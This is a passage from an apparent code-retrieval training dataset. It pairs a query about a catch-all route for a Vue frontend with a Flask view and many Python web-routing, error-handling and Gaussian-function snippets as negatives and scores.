the kernel\", kernel*sum_val)\n return kernel*sum_val", "def Gaussian_sampling(mu=1,beta=1,size=None,rng=np.random.RandomState(100)):\n \n if (not np.isscalar(mu)):\n size=mu.shape\n if np.isscalar(beta):\n beta=np.repeat(beta,size[0])\n beta.shape=(beta.size,1)\n X=np.copy(mu)\n #for i in range(size[0]):\n # for j in range(size[1]):\n # X[i,j]=rng.normal(mu[i,j],1/math.sqrt(beta[i,0]),size=1)\n X=rng.normal(loc=0,scale=1,size=size)\n X=X/np.sqrt(beta) + mu\n if (np.isscalar(mu) and size is None):\n size=1\n X=rng.normal(mu,1/math.sqrt(beta),size=size)\n #tol=100\n #X[abs(X)>tol]=tol\n return X", "def gauss_kernels(size, sigma=1.0):\n if size < 3:\n size = 3\n\n m = size / 2\n x, y = np.mgrid[-m:m + 1, -m:m + 1]\n kernel = np.exp(-(x * x + y * y) / (2 * sigma * sigma))\n kernel_sum = kernel.sum()\n\n if not sum == 0:\n kernel = kernel / kernel_sum\n\n return kernel", "def gaussianNormalised(data, mu, sigma):\n data = data - mu\n g = exp ( - data**2 / (2*sigma**2) )\n gSum = np.sum(g)\n \n if gSum == 0:\n print \"Warning gaussianNormalised:: Not normalising by sum of values, as sum = \" + str(gSum)\n return (g)\n else:\n return (g / gSum)", "def fit_power_law_MMEN(a_array, sigma_array, a0=1., p0=1., p1=-1.5):\n assert len(a_array) == len(sigma_array) >= 2\n mmen_fit = curve_fit(f_linear, np.log10(a_array/a0), np.log10(sigma_array), [p0, p1])[0]\n sigma0, beta = 10.**(mmen_fit[0]), mmen_fit[1]\n return sigma0, beta", "def gauss_kern(sigma, size):\r\n size = int(np.floor(size/2))\r\n sizey = size\r\n x, y = scipy.mgrid[-size:size+1, -sizey:sizey+1]\r\n g = scipy.exp(-(x**2+y**2) / (2*(sigma)**2))\r\n return np.ravel(g / g.max())", "def normal_pmf(x: np.array, mean: float, sigma: float) -> np.array:\n x = np.exp(-1 / 2 * ((x - mean) / sigma) ** 2)\n x /= np.sqrt(2 * np.pi * sigma ** 2)\n x /= x.sum()\n return x", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian_norot(*p)(*np.indices(data.shape)) -\n data)\n #scipy rihjt\n # Levenberg-Marquadt algorithm -> leastsq\n #bnds = None\n height, x, y, width_x, width_y, he1, x1,y1, wi1, wi2 = params\n #p, success = optimize.leastsq(errorfunction, params)\n bnds = (0,30)\n p = optimize.least_squares(errorfunction, params, bounds = bnds).x\n \n #least 
square fitting(minimizes raw data and fit)\n\n if(p[0] < 1 and p[5] < 1 and p[1] > 0 and p[1] < 30 and p[2] > 0 and p[2] < 30 and p[6] > 0 and p[6] < 30 and p[7] > 0 and p[7] < 30):\n #print(\"pass case\")\n return(p)\n else:\n print(\"failed case\")\n print(\"height1\", p[0],\"height2\", p[5], \"X\", p[1],\"Y\", p[2],\"Y1\", p[6], \"Y2\", p[7])\n print(\"bounding error\" + str(numero)) \n\n return p", "def calculateGaussian(x, mean, stdev):\n\t\t\texponent = math.exp(-(math.pow(x-mean,2)/(2*math.pow(stdev,2))))\n\t\t\tvalue= (1 / (math.sqrt(2*math.pi) * stdev)) * exponent\n\t\t\tif value==0:\n\t\t\t\treturn np.nan\n\t\t\telse:\n\t\t\t\treturn math.log(value)", "def fit_gaussian(self, velocities, powers, center):\n\n def just_amp_width(x, *p):\n \"p = (amplitude, width)\"\n return p[0] * np.exp(-((x - center) / p[1])**2)\n\n def full_fit(x, *p):\n \"p = (amplitude, width, center, background)\"\n return p[3] + p[0] * np.exp(-((x - p[2]) / p[1]) ** 2)\n\n center_index = len(velocities) // 2\n dv = velocities[1] - velocities[0]\n coeffs = [powers[center_index], 4 * dv] # initial guesses\n # estimate the amplitude\n coeff, var_matrix = curve_fit(\n just_amp_width, velocities, powers, p0=coeffs)\n\n # append coefficients to coeff for next fit\n new_coeff = [coeff[0], coeff[1], center, powers.mean()]\n final_coeff, var_matrix = curve_fit(\n full_fit, velocities, powers, p0=new_coeff\n )\n return dict(width=final_coeff[1],\n amplitude=final_coeff[0],\n center=final_coeff[2])", "def estimateGaussian(X):\n mu = X.mean(0, keepdims=True).T\n sigma2 = X.var(0, keepdims=True).T\n return mu, sigma2", "def gauss(x, *p):\n A, mu, sigma = p\n\n return A*np.exp(-(x-mu)**2/(2.*sigma**2))", "def gaussian_kernel(fsize, sigma):\n\n _x = _y = (fsize - 1) / 2\n x, y = np.mgrid[-_x:_x + 1, -_y:_y + 1]\n G = np.exp(-0.5 * (x**2 + y**2) / sigma**2)\n\n return G / G.sum()" ]
[ "0.68242663", "0.6790471", "0.67830956", "0.67823905", "0.67808473", "0.67197216", "0.67171425", "0.661976", "0.6550336", "0.6550336", "0.6507729", "0.64968884", "0.64913034", "0.64834434", "0.64469576", "0.6435371", "0.6381322", "0.6359356", "0.63252896", "0.6323852", "0.63093674", "0.62726945", "0.62665004", "0.6231665", "0.62253875", "0.62209135", "0.6216406", "0.6208563", "0.6201968", "0.6199323", "0.61916107", "0.6184906", "0.6173687", "0.61634463", "0.6151679", "0.6114588", "0.6074141", "0.60722035", "0.6066313", "0.60656875", "0.60550714", "0.6044955", "0.60071504", "0.6005987", "0.60001224", "0.59615576", "0.59587634", "0.59579605", "0.5954158", "0.5954158", "0.5954158", "0.5951571", "0.5942173", "0.59357667", "0.5918325", "0.5917329", "0.59112835", "0.5908893", "0.5902238", "0.58959436", "0.58657295", "0.5862573", "0.58589125", "0.5854492", "0.5846804", "0.5841227", "0.582916", "0.5826012", "0.5825096", "0.58207196", "0.5817486", "0.58174545", "0.58143735", "0.5807225", "0.5804523", "0.5804319", "0.5790789", "0.5787109", "0.5778747", "0.57770514", "0.57731414", "0.57667476", "0.57640773", "0.5761613", "0.5758186", "0.57576734", "0.57548743", "0.5753031", "0.57471055", "0.5739179", "0.5735551", "0.5734185", "0.57307357", "0.5730633", "0.57192886", "0.57073766", "0.5704744", "0.57040983", "0.56825197", "0.5681441" ]
0.5754527
87
method catches all requests that are not api requests ensures routing possibilities within VUE
def catch_all(path=''): return render_template('index.html')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serve(self, request, *args, **kwargs):\n raise Http404", "def serve(self, request, *args, **kwargs):\n raise Http404", "def serve(self, request, *args, **kwargs):\n raise Http404", "def serve(self, request, *args, **kwargs):\n raise Http404", "def serve(self, request, *args, **kwargs):\n raise Http404", "def test_unknown_routes():\n response = client.get(\"/unknown_endpoint\",\n headers={\"content-type\": \"application/json\"})\n assert response.status_code == status.HTTP_404_NOT_FOUND\n assert response.json() == {\"detail\": \"Not Found\"}", "def index_route(self, request, *args, **kwargs):\n raise Http404()", "def ping_missing_api(request):\r\n return _api_response(request, {\r\n 'success': False,\r\n 'message': 'The API url should be /api/v1'\r\n })", "def handle_request_unknown(self, msg):\n\t\traise NotFound()", "def handle_notify_request(self) -> HttpResponse:\n return HttpResponseNotFound()", "def vue_exception_handler(exc, context):\n if isinstance(exc, exceptions.APIException) and isinstance(exc.detail, (list, dict)):\n exc.detail = _flatten_vue_validation(exc.detail)\n\n return drf_exception_handler(exc, context)", "def notfound(request):\n return {}", "def handle_error(self, e):\n code = getattr(e, 'code', 500) # Gets code or defaults to 500\n if code == 404:\n return self.make_response({\n 'message': 'not-found',\n 'code': 404\n }, 404)\n return super(MyApi, self).handle_error(e) # handle others the default way", "def _route_get(self):\n if self.path == '/status':\n self._create_status()\n else:\n self._create_method_not_allowed()", "def opt_engine_rest_api():\n request_json = request.get_json()\n return process_request(request_json)", "def route_rejected(self, prefix, next_hop, as_path):", "def goblin(request, path):\n print \"This endpoint is throwing a 404 error!\"", "def view(obj, request):\n return HTTPNotFound()", "def index(request):\r\n badRequest(\"Url not found\")", "def view(self, url):\r\n abort(404)", "def dispatch(self, request, *args, **kwargs):\n\n if self.page['page_type'] != self.page_type:\n raise Http404\n return super().dispatch(request, *args, **kwargs)", "def _route(self, request, url):\n operationIndex = url[:-1].rfind('/')\n processorPath = url[:operationIndex]\n processor = self.api_processor_map.get(processorPath.lower()) \n operation = url[operationIndex+1:].rstrip('/').lower()\n \n http_methods, is_admin, is_cron = self.api_const.get_api_operation_perms(operation)\n \n if is_cron and users.get_current_user() is not None and not users.is_current_user_admin() :\n raise self.api_error.ApiError(self.api_error.API_ERROR_ADMIN_OPERATION, operation)\n \n if is_admin and not is_cron and not users.is_current_user_admin():\n raise self.api_error.ApiError(self.api_error.API_ERROR_ADMIN_OPERATION, operation)\n \n if request.method not in http_methods:\n raise self.api_error.ApiError(self.api_error.API_ERROR_INVALID_HTTP_METHOD, request.method, operation)\n \n if is_cron :\n context.get_context().set_login_required(False)\n \n return self._process(request, processor(), operation)", "def cloud_handler(event, context):\n # Payload & Headers initialization for GET API calls\n payload = {}\n headers = {}\n\n url = CORRECT_URL + \":\" + WRONG_PORT + API\n\n response = get_call_api(url, payload, headers)\n response_code = response.status_code\n try:\n response_data = response.json()\n except Exception as e:\n response_data = json.dumps(\"Error : {}\".format(e))\n\n return {\n \"url\": url,\n \"data\": response_data,\n \"status_code\": response_code\n }", "def 
handle_failure_request(self) -> HttpResponse:\n return HttpResponseNotFound()", "def dispatch_request(self, *args, **kwargs):\n try:\n return super().dispatch_request(*args, **kwargs)\n except HTTPException as e:\n logger.error(\"HTTP Error on APIResource %s\", e, exc_info=1)\n return return_response({\n \"code\": e.code,\n \"message\": e.description\n }, e.code)\n except BaseException as e:\n logger.error(\"Error occurred in APIResource %s\", e, exc_info=1)\n return return_response({\n \"code\": 500,\n \"message\": str(e)\n }, 500)", "def page_not_found(e):\n\n # Respons to api request\n if request.accept_mimetypes.accept_json and \\\n not request.accept_mimetypes.accept_html:\n resp = jsonify({'error': 'not found'})\n resp.status_code = 404\n return resp\n\n return render_template('errors/404.html'), 404", "def _pre_dispatch(self, request, *args, **kwargs):\n pass", "def process_request(self, request):\n # This middleware is only needed for regular browser pages.\n # It is incompatible with the mobile apps and APIs in general.\n if is_feature_enabled() and not is_api_request(request):\n self.patch_request(request)", "def route( request, c ):", "def route(self):\n pass", "def routes(self, body):\n pass", "async def generic_action(self, request):\n pass", "def extras_router(request, query):\n for pattern, func, req in patterns:\n match = pattern.match(query)\n if match and req:\n return func(request, **match.groupdict())\n elif match:\n return func(**match.groupdict())\n\n # Returns an Unimplemented response if no pattern matches\n return json_response(status=\"Unimplemented\", \n status_code=501, \n error=\"\", \n content=\"query: %s\" % query)", "def extras_router(request, query):\n for pattern, func, req in patterns:\n match = pattern.match(query)\n if match and req:\n return func(request, **match.groupdict())\n elif match:\n return func(**match.groupdict())\n\n # Returns an Unimplemented response if no pattern matches\n return json_response(status=\"Unimplemented\", \n status_code=501, \n error=\"\", \n content=\"query: %s\" % query)", "def index():\n # curl -k -X POST https://127.0.0.1:43210/api/v1.0 -H 'content-type: application/json' -d '{\"data\": \"exhaust\"}'\n return jsonify({'meta': {'success': True, 'code': 200}, 'result': {\"message\": request.get_json()}}), 200", "def test_bad_method(self):\n\n request = service.get_request('GET', {})\n x = self.start_request_tests(request)\n # GET method not allowed\n self.assertEqual(x.status_code, 405)\n # TBD: check for informativeness\n json.dump(x.to_dict(), sys.stdout, indent=2)", "def _handle_request(self, method, url, handler):\n if not(method in self.handlers):\n handler.set_status(405) # Method Not Allowed\n handler.write({})\n return\n for (path, fn) in self.handlers[method].items():\n if re.match(path, url):\n fn(url, handler)\n return\n handler.set_status(404) # Not Found\n handler.write({})", "async def _response_handler(self):", "def not_found():\n return HttpError(404)", "def index():\n\n return redirect(api)", "def view(self, url):\n abort(404)", "def do_GET(self):\n if not self.path or self.path == \"/\":\n self.redirect()\n elif self.is_viewvc():\n try:\n self.run_viewvc()\n except IOError:\n # ignore IOError: [Errno 32] Broken pipe\n pass\n else:\n self.send_error(404)", "def match_request(self):\n try:\n url_rule, self.request.view_args = \\\n self.url_adapter.match(return_rule=True)\n self.request.url_rule = url_rule\n except HTTPException as e:\n self.request.routing_exception = e", "def process_request(self, 
request):\n if hasattr(request, 'user') and request.user.is_authenticated():\n return None\n # Looking by url names\n match = resolve(request.path_info)\n if match.view_name in self.url_exceptions:\n return None\n # Looking by regexp matching\n for url in self.regexp_exceptions:\n if url.match(request.path_info):\n return None\n return redirect_to_login(request.get_full_path())", "def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)", "def xhr_not_found_view(request):\n return HTTPNotFound()", "async def handle_request(self, api_endpoint, api_version):\n code = 400\n data = self.get_post_data()\n request_method = self.request.method.lower()\n if data:\n try:\n # will call process_get or process_post methods for the given API\n res = await getattr(api_endpoint, 'process_' + request_method)(api_version, data)\n code = 200\n except ValidationError as validerr:\n if validerr.absolute_path:\n res = '%s : %s' % (\n validerr.absolute_path.pop(), validerr.message)\n else:\n res = '%s' % validerr.message\n LOGGER.error('ValidationError: %s', res)\n raise tornado.web.HTTPError(reason=res)\n except ValueError as valuerr:\n res = str(valuerr)\n LOGGER.error('ValueError: %s', res)\n raise tornado.web.HTTPError(reason=res)\n except DatabaseError as dberr:\n err_id = dberr.__hash__()\n res = str(dberr.reason)\n LOGGER.error(res)\n LOGGER.info(\"Input data for <%s>: %s\", err_id, data)\n raise dberr\n except Exception as err: # pylint: disable=broad-except\n err_id = err.__hash__()\n res = 'Internal server error <%s>:' \\\n 'please include this error id in bug report.' % err_id\n code = 500\n LOGGER.exception(res)\n LOGGER.info(\"Input data for <%s>: %s\", err_id, data)\n raise tornado.web.HTTPError(reason=res)\n else:\n res = 'Error: malformed input JSON.'\n LOGGER.error(res)\n raise tornado.web.HTTPError(reason=res)\n\n # raise tornado.web.HTTPError(status_code=444, reason='error happened')\n self.set_status(code)\n self.write(res)", "def get(self, request):\n pass", "async def _noop_error_handler(ctx: \"RequestContext\") -> None:", "async def handle_request(self, request: aioweb.request.Request):", "def do_GET(self):\n global st_point, cur_request\n if time.time() - st_point < 1 and cur_request > args.MAX_REQ:\n self.send_response(429)\n self.send_header(\"Content-type\",\"text/html\")\n self.end_headers()\n time.sleep(0.2)\n return\n elif time.time() - st_point > 1:\n st_point = time.time()\n cur_request = 1\n self.func_PARSE()\n if self.parsed_url[2] in [\"/ping\", \"/cats\"]:\n self.func_DO()\n else:\n self.send_response(400)\n text=\"<h1 align=center>Bad request</h1>\"\n self.func_PRINT(text)", "def handle_request(self, request: HttpParser) -> None:\n raise NotImplementedError() # pragma: no cover", "def api_handler(request):\n\n\tif request.method == \"GET\":\n\n\t\tform = ApiForm(request.GET)\n\n\t\tif form.is_valid():\n\n\t\t\tif form.cleaned_data[\"data\"] == \"product\":\n\n\t\t\t\t# Get the system discound\n\t\t\t\tsystem_discount = True if request.user.is_authenticated else False\n\t\t\t\tif system_discount:\n\t\t\t\t\tdiscount_per = 20\n\n\t\t\t\tif form.cleaned_data[\"q\"]:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tproduct = Products.objects.get(hash_key=form.cleaned_data[\"q\"])\n\t\t\t\t\t\treturn JsonResponse({\"STATUS\": True, \"product\": {\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"hash_key\": product.hash_key,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"image_0\": (product.image_0.url).replace(\"&export=download\", \"\") if product.image_0.url else 
None,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"image_1\": (product.image_1.url).replace(\"&export=download\", \"\") if product.image_1.url else None,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"available\": product.available,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"pk\": product.pk,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"name\": product.name, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"price\": product.price * (100 - discount_per) / 100 if system_discount else product.price, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"discount\": system_discount,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"old_price\": \"{:,.2f}\".format(product.price),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"description\": product.description,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"available_sizes\": product.available_sizes[0][\"sizes\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"card_color\": product.card_color,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t\t\t\t})\n\t\t\t\t\texcept Products.DoesNotExist:\n\t\t\t\t\t\treturn JsonResponse({\"STATUS\": True, \"product\": {}})\n\t\t\t\treturn JsonResponse({\"STATUS\": False})\n\t\t\t\n\t\t\t# Check if the API is asking for a coupon code\n\t\t\telif form.cleaned_data.get(\"data\") == \"coupon\":\n\n\t\t\t\t# Check if the Coupon Code is valid and in the Database\n\t\t\t\ttry:\n\t\t\t\t\tcoupon_data = CouponCodes.objects.get(code=form.cleaned_data.get(\"code\"))\n\n\t\t\t\t\t# Return the Percentage the coupon code has\n\t\t\t\t\treturn JsonResponse({\"STATUS\": True, \"VALID\": True, \"PERCENT\": float(coupon_data.percentage)})\n\t\t\t\texcept CouponCodes.DoesNotExist:\n\t\t\t\t\treturn JsonResponse({\"STATUS\": True, \"VALID\": False, \"PERCENT\": 0})\n\t\t\telse:\n\t\t\t\treturn JsonResponse({\"STATUS\": False})\n\t\telse:\n\t\t\treturn JsonResponse({\"STATUS\": False, \"error_message\": form.errors.get_json_data()})", "def page_not_found(e):\n # Message to the user\n message = {\n \"err\":\n {\n \"msg\": \"This route is currently not supported. 
Please refer API documentation.\"\n }\n }\n # Making the message looks good\n resp = jsonify(message)\n # Sending OK response\n resp.status_code = 404\n # Returning the object\n return resp", "def route(self, request, url):\n error = None\n try :\n return self._route(request, url)\n except self.api_error.ApiError, a_e:\n error = a_e\n logging.exception(\"API error!\")\n except Exception, e:\n error = self.api_error.ApiError(self.api_error.API_ERROR_UNKNOWN, \"Root error is type '%s' with original message: '%s'.\" % (e.__class__, e.message))\n logging.exception(\"Unknown API error!\")\n \n ret_msg = json.dumps(dict(error_code=error.error_code,error_msg=str(error)), indent=4)\n return HttpResponse(ret_msg, mimetype='application/json')", "def test_api(self):\n new_route = self.route.api(\"new\")\n assert new_route != self.route\n assert new_route.route[\"api\"] == \"new\"", "def dispatch_request(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n self.meth = request.method.lower()\n self.resource = current_app.blueprints.get(request.blueprint, None)\n\n if not any([self.meth in self.methods, self.meth.upper() in self.methods]):\n return self.return_error(405)\n\n self.process_before_request_hooks()\n\n resp = super(Endpoint, self).dispatch_request(*args, **kwargs)\n resp = self.make_response(resp)\n\n resp = self.process_after_request_hooks(resp)\n\n return resp", "def test_gourde_views(self):\n rv = self.app.get(\"/-/\")\n self.assertEqual(rv.status_code, 200)\n\n rv = self.app.get(\"/-/threads\")\n self.assertEqual(rv.status_code, 200)\n\n rv = self.app.get(\"/-/ready\")\n self.assertEqual(rv.status_code, 200)", "def test_unauthenticated_service_blocked(self):\n raise NotImplementedError # FIXME", "def __init__(self, request: object) -> None:\n super().__init__({}, request, URL, Api)", "async def json(request):\n requester = request.headers.get('X-FORWARDED-FOR', None)\n print(\"Serving JSON requested by\", requester)\n try:\n component = request.match_info['component']\n except:\n component = None\n json_data = await data.get_data(component=component)\n return web.json_response(json_data)", "def _configure_api_routes(self, app: FastAPI):\n authenticator = JWTAuthenticator(self.signer)\n\n data_update_publisher: Optional[DataUpdatePublisher] = None\n if self.publisher is not None:\n data_update_publisher = DataUpdatePublisher(self.publisher)\n\n # Init api routers with required dependencies\n data_updates_router = init_data_updates_router(\n data_update_publisher,\n self.data_sources_config,\n authenticator\n )\n webhook_router = init_git_webhook_router(self.pubsub.endpoint, authenticator)\n security_router = init_security_router(self.signer, StaticBearerAuthenticator(self.master_token))\n\n # mount the api routes on the app object\n app.include_router(bundles_router, tags=[\"Bundle Server\"], dependencies=[Depends(authenticator)])\n app.include_router(data_updates_router, tags=[\"Data Updates\"], dependencies=[Depends(authenticator)])\n app.include_router(webhook_router, tags=[\"Github Webhook\"])\n app.include_router(security_router, tags=[\"Security\"])\n app.include_router(self.pubsub.router, tags=[\"Pub/Sub\"])\n\n if self.jwks_endpoint is not None:\n # mount jwts (static) route\n self.jwks_endpoint.configure_app(app)\n\n # top level routes (i.e: healthchecks)\n @app.get(\"/healthcheck\", include_in_schema=False)\n @app.get(\"/\", include_in_schema=False)\n def healthcheck():\n return {\"status\": \"ok\"}\n\n return app", "def handle_request_get(self, msg):\n\n\t\tfor 
arg in msg.arguments:\n\t\t\tmethod = {\n\t\t\t\t'ucr': self.handle_request_get_ucr,\n\t\t\t\t'meta': self.handle_request_get_meta,\n\t\t\t\t'info': self.handle_request_get_info,\n\t\t\t\t'modules/list': self.handle_request_get_modules,\n\t\t\t\t'modules': self.handle_request_get_modules,\n\t\t\t\t'categories/list': self.handle_request_get_categories,\n\t\t\t\t'categories': self.handle_request_get_categories,\n\t\t\t\t'user/preferences': self.handle_request_get_user_preferences,\n\t\t\t\t'hosts/list': self.handle_request_get_hosts,\n\t\t\t\t'hosts': self.handle_request_get_hosts,\n\t\t\t}.get(arg)\n\t\t\tif method:\n\t\t\t\tself.finished(msg.id, method(msg))\n\t\t\t\treturn\n\t\traise NotFound()", "def _load_api(self):\n self.app.add_url_rule('/scheduler', 'get_scheduler_info', self._apply_auth(api.get_scheduler_info))\n self.app.add_url_rule('/scheduler/jobs', 'add_job', self._apply_auth(api.add_job), methods=['POST'])\n self.app.add_url_rule('/scheduler/jobs', 'get_jobs', self._apply_auth(api.get_jobs))\n self.app.add_url_rule('/scheduler/jobs/reload_jobs', 'reload_jobs', self._apply_auth(api.reload_jobs), methods=['POST'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>', 'get_job', self._apply_auth(api.get_job))\n self.app.add_url_rule('/scheduler/jobs/<job_id>', 'delete_job', self._apply_auth(api.delete_job), methods=['DELETE'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>', 'update_job', self._apply_auth(api.update_job), methods=['PATCH'])\n self.app.add_url_rule('/scheduler/jobs/<id>/reschedule', 'reschedule_job', self._apply_auth(api.reschedule_job), methods=['PATCH'])\n self.app.add_url_rule('/scheduler/jobs/<id>/reschedule_once', 'reschedule_job_once', self._apply_auth(api.reschedule_job_once), methods=['PATCH'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>/pause', 'pause_job', self._apply_auth(api.pause_job), methods=['POST'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>/resume', 'resume_job', self._apply_auth(api.resume_job), methods=['POST'])\n self.app.add_url_rule('/scheduler/jobs/<job_id>/run', 'run_job', self._apply_auth(api.run_job), methods=['POST'])", "def test_get_request_should_not_work(self):\n response = self.client.get(reverse('user-list'))\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)", "def before_all(context):\n set_services(context)\n context.api = {}\n context.repositories = {}\n\n for service, location in context.services.items():\n url = urlparse.urlparse(location)\n api = API(url.scheme + '://' + url.netloc, async=False)\n try:\n context.api[service] = getattr(api, url.path.split('/')[2])\n except:\n context.api[service] = getattr(api, service)", "def test_handle_no_url_match(self):\n with self.assertRaises(Resolver404):\n with mock.patch(self.view) as view:\n self.handler.handle(self.request, '/no/match/')\n\n self.assertFalse(view.called)", "def handle_get(self, request, user, *args, **kwargs):\n\n try:\n # User permission\n if not has_perm(user, AdminPermission.VIPS_REQUEST, AdminPermission.READ_OPERATION):\n self.log.error(\n u'User does not have permission to perform the operation.')\n return self.not_authorized()\n\n id_rule = kwargs.get('id_rule')\n\n if not is_valid_int_greater_zero_param(id_rule):\n self.log.error(\n u'Parameter id_rule is invalid. 
Value: %s.', id_rule)\n raise InvalidValueError(None, 'id_rule', id_rule)\n\n rule = Rule.objects.get(pk=id_rule)\n contents = RuleContent.objects.filter(rule=rule)\n\n rule_contents = list()\n rule_blocks = list()\n for content in contents:\n block_id = 0\n try:\n block = BlockRules.objects.get(\n content=content.content, environment=content.rule.environment)\n block_id = block.id\n except Exception:\n pass\n\n rule_contents.append(content.content)\n rule_blocks.append(block_id)\n\n return self.response(dumps_networkapi({'rule': {'name': rule.name, 'rule_contents': rule_contents, 'rule_blocks': rule_blocks}}))\n\n except InvalidValueError, e:\n self.log.error('Invalid param')\n return self.response_error(269, e.param, e.value)\n except Rule.DoesNotExist:\n return self.response_error(358)\n except Exception, e:\n self.logerror(e)\n return self.response_error(1)", "def method_not_allowed() :\n raise cherrypy.HTTPError(405, \"Method Not Allowed\")", "def handle_405(request, permitted_methods):\n not_allowed = django.http.HttpResponseNotAllowed(permitted_methods)\n return handle_error(request, not_allowed, \"405.html\")", "def test_precedence(self):\n self.assertViewBehavior(\n status_code=405,\n headers_exclude=\"Cache-Control\")", "def _filter_in_request(self):\n pass", "def check_all_routes(event: ApplicationCreated) -> None:\n\n def remove_prefixes(path: str) -> str:\n path = f\"/{path}\" if not path.startswith(\"/\") else path\n for prefix in prefixes:\n if path.startswith(prefix):\n prefix_length = len(prefix)\n return path[prefix_length:]\n return path\n\n app = event.app\n settings = app.registry.settings\n apinames = settings.get(\"pyramid_openapi3_apinames\")\n if not apinames:\n # pyramid_openapi3 not configured?\n logger.warning(\n \"pyramid_openapi3 settings not found. \"\n \"Did you forget to call config.pyramid_openapi3_spec?\"\n )\n return\n\n for name in apinames: # pragma: no branch\n openapi_settings = settings[name]\n\n if not settings.get(\"pyramid_openapi3.enable_endpoint_validation\", True):\n logger.info(\"Endpoint validation against specification is disabled\")\n return\n\n prefixes = _get_server_prefixes(openapi_settings[\"spec\"])\n\n paths = list(openapi_settings[\"spec\"][\"paths\"].keys())\n routes = [\n remove_prefixes(route.path) for route in app.routes_mapper.routes.values()\n ]\n\n missing = [r for r in paths if r not in routes]\n if missing:\n raise MissingEndpointsError(missing)\n\n settings.setdefault(\"pyramid_openapi3\", {})\n settings[\"pyramid_openapi3\"].setdefault(\"routes\", {})\n\n # It is possible to have multiple `add_route` for a single path\n # (due to request_method predicates). 
So loop through each route\n # to create a lookup of route_name -> api_name\n for route_name, route in app.routes_mapper.routes.items():\n if remove_prefixes(route.path) in paths:\n settings[\"pyramid_openapi3\"][\"routes\"][route_name] = name", "def handle_request(self, path=None):\n req = get_request()\n resp = super().handle_request(req)\n return to_response(resp)", "def test_unsupported_requests_fail(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 405)\n\n response = self.client.put(self.url)\n self.assertEqual(response.status_code, 405)\n\n response = self.client.patch(self.url)\n self.assertEqual(response.status_code, 405)", "def root_simple_error_handler(exc, *args, app_name=''):\n\n #print('args',args)\n check_exception = 0\n for each_args in args:\n #print('each_args',each_args['view'].__module__)\n if each_args['view'].__module__ == 'hrms.views' or each_args['view'].__module__ == 'pms.views':\n #print('ok')\n check_exception = 1\n if isinstance(exc,ValidationError):\n print('ValidationError',exc)\n print('ValidationError',exc.get_codes())\n #n = dict(exc.detail)\n headers = {}\n if check_exception == 1:\n return Response({'error': exc.detail},status=exc.status_code,headers=headers)\n else:\n return Response(exc.detail,status=exc.status_code,headers=headers)\n\n elif isinstance(exc, exceptions.APIException):\n print('APIException',exc.get_full_details())\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['X-Throttle-Wait-Seconds'] = '%d' % exc.wait\n print('exc.detail',exc.detail)\n if check_exception == 1:\n return Response({'error': exc.detail},status=exc.status_code,headers=headers)\n else:\n return Response(exc.detail,status=exc.status_code,headers=headers)\n\n elif isinstance(exc, Http404):\n print('Http404')\n if check_exception == 1:\n return Response({'error': 'Not found'},status=status.HTTP_404_NOT_FOUND)\n else:\n return Response('Not found',status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n print('PermissionDenied')\n if check_exception == 1:\n return Response({'error': 'Permission denied'},\n status=status.HTTP_403_FORBIDDEN)\n else:\n return Response('Permission denied',status=status.HTTP_403_FORBIDDEN)\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def http_method_not_allowed(self, *args, **kwargs):\n\t\treturn self.abort(status.HTTP_405_METHOD_NOT_ALLOWED)", "def mvcRouter(self, router):\n pass", "def do_GET(self):\n\n files = { \"/index.html\": \"index.html\",\n \"/\" : \"index.html\",\n \"/timeline-min.js\": \"timeline-min.js\",\n \"/timeline.js\": \"timeline.js\",\n \"/timeline.css\": \"timeline.css\"\n }\n if self.path in files:\n self._ServeFile(files[self.path])\n return\n\n if self.path.startswith(\"/api/data\"):\n self._ServeData()\n return\n\n self.send_error(404,'File Not Found: %s' % self.path)", "def login_required_processor(request):\n if request.user.is_authenticated():\n return {}\n if \"de.thefoundation.DENIED\" in request.META:\n return {}\n if request.path.startswith(u\"/media/\"):\n return {}\n if request.path in ['/login/', '/login/failed/', '/imprint/']:\n return {}\n request.META[\"de.thefoundation.DENIED\"] = True\n raise django.http.Http404(handle_404(request))", "def search_api(request):\n data = ApiViewFilters(request.GET, queryset=ApiView.objects.all())\n return render(request, 'template.html', {'filter': data})", "def _handle_api_error(ex):\n if 
